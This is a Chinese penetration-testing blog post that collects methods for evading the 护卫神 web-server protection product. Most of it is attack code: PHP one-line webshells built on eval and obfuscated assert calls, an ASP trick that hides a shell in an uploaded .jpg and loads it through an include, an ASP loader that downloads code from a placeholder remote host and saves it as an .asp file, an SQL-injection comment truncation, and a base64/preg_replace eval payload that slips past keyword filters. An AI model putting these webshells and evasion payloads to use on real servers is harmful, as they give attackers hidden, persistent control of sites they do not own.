您的位置 » 首页 » 渗透测试 » 绕过护卫神:护卫神绕过方法总结

绕过护卫神:护卫神绕过方法总结

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2013年01月06日 | 文章热度:7,651 次 全屏阅读

显示不全请点击全屏阅读

一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿

一、马儿篇
—————-1号————————–

<?php
@eval
($_POST[‘1′]);?>

—————-2号————————–

<title>login</title>nono<?php
 
eval
($_POST
[1])
 
?>
——————–3号————————

<?php $a = str_replace(x,””,”axsxxsxexrxxt”);
$a($_POST[“c”]); ?>

菜刀直接连,不需要构造连接字符串,密码 c

——————–类似于过安全狗的包含方法——————————————-
A.asp版本:

将一句话保存为  XX.jpg  上传后 地址为  …/xxxxxx.jpg

在上传一个 x.asp 内容为 <!–#include  file=”../xxxxxx.jpg”–>

B.php版本

如果是php的话:

<?php
include “1.htm”;
?>

——————实在不行,还可以下载——————————————————
远程下载马

<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“ls.asp”),2
set sGet = nothing
set sPOST = nothing
%>

—————————————————————

二、注入篇

/*%00*/截断符
select/*%00*/* from admin;

—————————————————————

三、规则篇

可以利用类似:

<?php
$code=’一串base64’; //base64编码
$x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换
$a = ‘/a/’;//正则规则
preg_replace($a,’e’.’v’.’a’.’l’.'(‘.$x.'(‘.$code.’))’,’a’); //正则替换
?>

方法绕过关键词过滤
转自:http://fuck.0day5.com/?p=227
转自:http://www.waitalone.cn/post/HWS_Bypass.html

Tags:

绕护卫神,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1982/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)